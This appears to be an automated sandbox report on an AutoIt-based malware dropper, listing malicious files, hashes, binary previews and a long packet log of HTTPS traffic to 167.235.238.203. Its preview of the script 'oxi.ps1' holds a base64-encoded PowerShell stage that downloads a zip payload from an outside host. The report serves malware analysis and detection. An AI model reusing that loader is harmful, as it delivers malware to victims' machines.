                                  • Filename: AutoIt_Dropper.exe, Detection: malicious
                                  • Filename: AutoIt_Dropper.exe, Detection: malicious
                                  • Filename: 08-May-24-document-38438dbb.jar, Detection: malicious
                                  • Filename: 08-May-24-document-38438dbb.jar, Detection: malicious
                                  • Filename: yyyyyyyyyyyy.msg, Detection: malicious
                                  • Filename: Phish Alert EXTERNAL SUSPECTED SPAM Re RFQ for SMART 924.msg, Detection: malicious
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                  Category:dropped
                                  Size (bytes):787241
                                  Entropy (8bit):7.998330242391652
                                  Encrypted:true
                                  SSDEEP:24576:0sJBgav2i0qpqYBEmjXMNQjzpb57QU8ONZ:0sP7v2WdBEe4UFNZ
                                  MD5:763D557C3E4C57F7D6132A444A930386
                                  SHA1:77AAF9C8B944F7178067430AEF42F60A2AC1F41C
                                  SHA-256:5316FC2CB4C54BA46A42E77E9EE387D158F0F3DC7456A0C549F9718B081C6C26
                                  SHA-512:B3BC950079330BCF31490EB704F712A99E1832AD931E3905132425F957AE1EF4509FD4B6075A0CB001843CAD07650CFEA65DC678EB323400593EE983F46FA4AB
                                  Malicious:false
                                  Preview:PK.........!.X...v............Autoit3.exe..}|SE.8..$.m...R.J.UQ...5.)m."-... .E.Z#*BB.....^.........(..-EZ.y.......T-ZK....s.&-...>.....+L...>g...3yw..L. ..4M.6...!......0..w....}|..C..WL.x`^....?.......$.s_.\..I.<..9. .Gf.w......<...\1...[#.>cG...;......e..Z..G...sG.....G.tznl...#Z.Z.o.~is..B|...?A....O.~....?po......r.B.!F.......;&\i.`...j..."...3...}.x....b...F.B.@......Q...}F...s...........|X<Px-..s..k....~B..a....?o,..>......*.<....+.m...S.f.8w....a..F.....87c(.q#.&x.c...dx.0..x.7.7.^...y.....c.c~s.......@........'......m.;WP...$T(.3.u..FaZ..3. T...&..e".<...Q@........Wc..<......5..P@.z.3..o.9}...l..+.3......v9d....A..e.....y....N.......{1....Q.ASn6@.1.}.Bw..WPT.N..N.l...K...v...`.&,.50q........g.Y..5.0..m+..E......b..L...A$.2...Z.Z.R...&(.IJi.......+......J....d.*Y.%k..5U..d.T.f.. .{....C......K.-......qB@].CM.1.6+TV^...4[...?j.M...e1.NY<.~=.[E...[..M.}.o...[.,^E.......%.}.~...Z..J.....~..m._...tzk!....8..&../..bE&<7..zU...[-.rM.&ie3....k
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):560804
                                  Entropy (8bit):6.913976402760439
                                  Encrypted:false
                                  SSDEEP:12288:NeZu+gIZHxCQ4bamk1FNTVRppgU+ehWwhz5u6+c5zzq:VqRCQ4RU7ppgK35t+cdO
                                  MD5:DFA96717B69FA69D264A60B9DE36F078
                                  SHA1:B18DD41BCDC7A75A4B505CBDFB337CF19A2934D8
                                  SHA-256:493FB733897F4C3D7ADF01D663E711E2E47240BFDF5B99ABD230AA809F43A8CF
                                  SHA-512:5772CDAC81361297D72F620E23068DA8180FCE09935340CAAF279B6719F446AD3FD85DFC3004258E943092A73F914B84F9A12EF85630AC32410D1A7DDD3B41C7
                                  Malicious:false
                                  Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M........+..M...F.f.q..R,..].>>.r.nw.i@.../9...w.6..;..$dr..yO.n....-.....qH..O....?@....L.9"...]g....~.t_.1N(...+..............'......>'......>kC.R......%x....}...q..U-...(....%....V..?p.h.....l)".N.#.R......v.k@3.Q..\...I.h...%D'7...Y.....6(..)w....+...........7.`....8.u....h..0p.R%. /....^,.B..=H.{.X.....t....f.. b..'......>'......>m.........8.5...x...(.U?j....$.1.#.~.\......<.iw..}.k.5-|...d..6c)*.&......a.X9.v..*.q..W@3X-......O..m......ik...x(....6.y`xx.....C\%.r...!...piR.-..Q..=.7...P..,...J.).oO..]......F<.4,...JPZ..;.S..q,......iv.2I..a.5....>...P....X.,hj..&._<......x......,.n..8...X|&..{..K.{...).....I.. u..J....R:.......u...b....p.\q..PIgPm..6.{.9..x......P.......`..7..`..0.F..t..l...w...y.:..F&[.R$3..,.X.o#)..X...ce..Z...h.VZ.%]v.......+.........%;...:...Nu.z.k.vn1?h.6....L.?E..I..d..Q..!....7m.....t.?l...u.!'?%...QK...W5..L}
                                  File type:ASCII text, with very long lines (717)
                                  Entropy (8bit):5.917642981233913
                                  TrID:
                                    File name:oxi.ps1
                                    File size:865 bytes
                                    MD5:f391262039244472c29e2b3b788a4a79
                                    SHA1:b6db78ac395a0191883670595a88bd0fa52a87f8
                                    SHA256:d28c416add7fe55e7b1a20e30013e870cfb2eb3c9a5962ed4047766a43fa4f5e
                                    SHA512:5797b2175e4a9cba73c8ddda42968a4536eb3716e90f8038ce774d45ca8e65ba749cca94010954f841b3292a65c591b2b2ccb94f44af857ff2d7786a709f6d06
                                    SSDEEP:24:U5ahn9DiR2wWtlVZBJqAsG8LrZHDPQE6R18YBH2MTt9N7Lw1PKC2V8g:UKnvVZiG8xHDQEit1u1P3U
                                    TLSH:371196499FBF1D0AF9404530BBA8D965965C0555748C2D07BB04F68347C5C4E7BBF11C
                                    File Content Preview:ipconfig /flushdns..$base64 = "JHZwID0gImh0dHBzOi8va29zdHVtbjEuaWxhYnNlcnZlci5jb20vMS56aXAiOw0KJGJlID0gImM6XFxkb3dubG9hZHMiOw0KTmV3LUl0ZW0gLUl0ZW1UeXBlIERpcmVjdG9yeSAtRm9yY2UgLVBhdGggJGJlOw0KSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdnAgLU91dEZpbGUgJGJlXFRVLnppcDsN
                                    Icon Hash:3270d6baae77db44
                                    Timestamp                             Source Port  Dest Port  Source IP        Dest IP
                                    May 27, 2024 18:28:58.639189005 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:58.639219999 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:58.639286995 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:58.658905029 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:58.658922911 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.342791080 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.343122005 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.347573996 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.347584009 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.348084927 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.358757973 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.406497955 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.617794991 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.659836054 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.717294931 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.717328072 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.717345953 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.717374086 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.717389107 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.717394114 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.717413902 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.717426062 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.717451096 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.717452049 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.717497110 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.722327948 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.722378016 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.722404957 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.722418070 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.722441912 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.722450972 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.814213991 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.814325094 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.814403057 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.814433098 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.814448118 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.814477921 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.819106102 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.819152117 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.819188118 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.819195032 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.819221020 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.819233894 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.822675943 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.822725058 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.822750092 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.822756052 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.822788954 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.822802067 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.827676058 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.827728033 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.827771902 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.827780008 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.827821970 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.827841043 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.913652897 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.913721085 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.913760900 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.913777113 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.913811922 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.913824081 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.917529106 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.917579889 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.917622089 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.917629957 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.917664051 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.917679071 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.920706034 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.920751095 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.920784950 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.920792103 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.920819998 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.920833111 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.923902035 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.923944950 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.923979998 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.923986912 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.924016953 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.924031973 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.926378965 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.926424980 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.926460981 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.926466942 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:28:59.926505089 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:28:59.926516056 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.000696898 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.000776052 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.000816107 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.000832081 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.000844955 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.000876904 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.003865957 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.003916025 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.003935099 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.003942966 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.003971100 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.003988981 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.009603977 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.009671926 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.009702921 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.009708881 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.009746075 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.009752989 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.011449099 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.011497021 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.011538029 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.011543989 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.011569023 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.011585951 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.014349937 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.014390945 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.014425039 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.014431000 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.014455080 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.014472008 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.016375065 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.016419888 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.016450882 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.016458035 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.016486883 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.016495943 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.019340992 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.019393921 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.019422054 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.019428968 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.019460917 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.019483089 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.021336079 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.021377087 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.021404028 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.021411896 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.021435022 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.021456957 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.026819944 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.088454962 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.088525057 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.088579893 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.088592052 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.088620901 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.088654041 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.090759039 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.090806007 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.090837955 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.090845108 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.093458891 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.093458891 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.097187042 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.097248077 CEST  443          49730      167.235.238.203  192.168.2.4
                                    May 27, 2024 18:29:00.097276926 CEST  49730        443        192.168.2.4      167.235.238.203
                                    May 27, 2024 18:29:00.097282887 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.097331047 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.098345995 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.098390102 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.098412991 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.098418951 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.098447084 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.098464966 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.100083113 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.100136042 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.100166082 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.100178957 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.100203037 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.100220919 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.101818085 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.101872921 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.101900101 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.101906061 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.101932049 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.101950884 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.102605104 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.103694916 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.103744030 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.103769064 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.103775024 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.103801012 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.103816986 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.104826927 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.104878902 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.104887009 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.104912996 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.104939938 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.104954004 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.116373062 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.177377939 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.177440882 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.177448988 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.177476883 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.177505016 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.177522898 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.178531885 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.178596020 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.178602934 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.178627968 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.178654909 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.178669930 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.187443972 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.187508106 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.187510014 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.187540054 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.187565088 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.187577963 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.188838959 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.188908100 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.188920975 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.188941002 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.188966036 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.188981056 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.190423965 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.190494061 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.190517902 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.190550089 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.190579891 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.190587997 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.191971064 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.192038059 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.192049026 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.192070961 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.192099094 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.192111969 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.193761110 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.193809032 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.193825960 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.193835974 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.193861008 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.193881989 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.194633007 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.194679022 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.194695950 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.194704056 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.194730997 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.194744110 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.198606968 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.265736103 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.265810966 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.265819073 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.265841961 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.265872955 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.265887022 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.271348953 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.277364969 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.277415991 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.277426958 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.277446032 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.277463913 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.277484894 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.277518034 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.283552885 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.283613920 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.283627033 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.283646107 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.283675909 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.283689976 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.284518003 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.284569025 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.284584045 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.284590960 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.284631014 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.285339117 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.285393000 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.285428047 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.285434008 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.285443068 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.285466909 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.286365986 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.286397934 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.286442995 CEST44349730167.235.238.203192.168.2.4
